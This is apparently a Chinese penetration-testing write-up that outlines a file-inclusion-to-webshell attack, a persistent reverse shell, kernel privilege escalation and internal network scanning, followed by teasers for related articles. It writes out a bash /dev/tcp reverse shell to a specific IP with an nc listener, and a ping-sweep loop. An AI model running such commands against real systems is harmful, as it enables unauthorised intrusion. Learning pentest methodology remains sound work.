一、web应用信息收集

1、端口扫描

nmap扫描结果

2、文件包含漏洞

文件包含漏洞

二、web应用漏洞利用

1、找到可写入路径

权限

2、写shell

shell上传

三、内网渗透初探

1、建立持续性shell
通过bash，nc建立持续性shell。

被控机：bash -i >& /dev/tcp/175.24.112.166/8080 0>&1
vps：nc -lvvp 8080

shell

2、提权

linux提权思路——查看内核版本，找特殊目录，找特殊应用等。

用uname -a查看内核版本，寻找该内核版本漏洞。上传提权exp：

可以菜刀直接上传；
可以搭个web服务，用wget下载；
也可以被控机从vps scp获得。

发现tmp目录下拥有执行权限，进行提权操作。

提权

四、横向扩展

1、内网环境探测
通过arp -a探测到路由情况，
然后通过批量ping的bash脚本探测内网环境。

for var in {1..254};
do
  ip=192.168.1.$var
  ping -c 1 $ip | grep ttl
done

2、代理
利用msf搭建socks，使用proxychains代理nmap扫描。
https://www.cnblogs.com/diligenceday/p/11010733.html

渗透测试实战1
一、web应用信息收集 1、端口扫描 2、文件包含漏洞二、web应用漏洞利用 1、找到可写入路径 2、写shel...
渗透测试(1)
1.渗透测试的工作者要能保持理性，不要用自己的知识和技术要做违反法律法规的事情，不要恶意使用他人的信息。 2.渗透...
“愚”期不候，有份书籍福利送给你 |《内网安全攻防:渗透测试实战
最近的一段时间，我们都被这本书-内网渗透测试与安全防御的书籍《内网安全攻防：渗透测试实战指南》刷屏了，业界多位大佬...
渗透注意事项/审计
一.本文介绍 1、本文介绍渗透测试前注意事项、渗透测试步骤、查找XSS漏洞。二.学习步骤 1、渗透测试前注意事项...
渗透注意事项与代码审计
渗透注意事项/审计一.本文介绍1、本文介绍渗透测试前注意事项、渗透测试步骤、查找XSS漏洞。二.学习步骤1、渗透...
渗透测试伪实战-----BlackMarket
算是一次小打小闹的渗透测试了，学到的东西果然不少!（冒着挂科的危险，仍然要做渗透，这就是所谓的爱吧！）BlackM...
《Kali渗透测试技术实战》
这本书在亚马逊上评论8分左右，买回来看了有3次就看完了。事实证明，这本书只是一个渗透测试概念的普及书。收获最大的是...
Metasploitable 3 渗透测试实战
Metasploitable 3简介 Metasploitable 3 内置一些安全机制，比如防火墙，权限设置等。...
渗透测试实战之运气
本文作者 : 重生信安 - 一位低调的大佬 ### 0x00 嗝 > 在渗透测试的过程中，总会碰到各种各样有意...
二、渗透测试基本流程
菜鸟学习笔记，请多多指教！渗透测试流程 2.1 渗透测试基本流程渗透测试的基本流程主要分为以下几步： 1...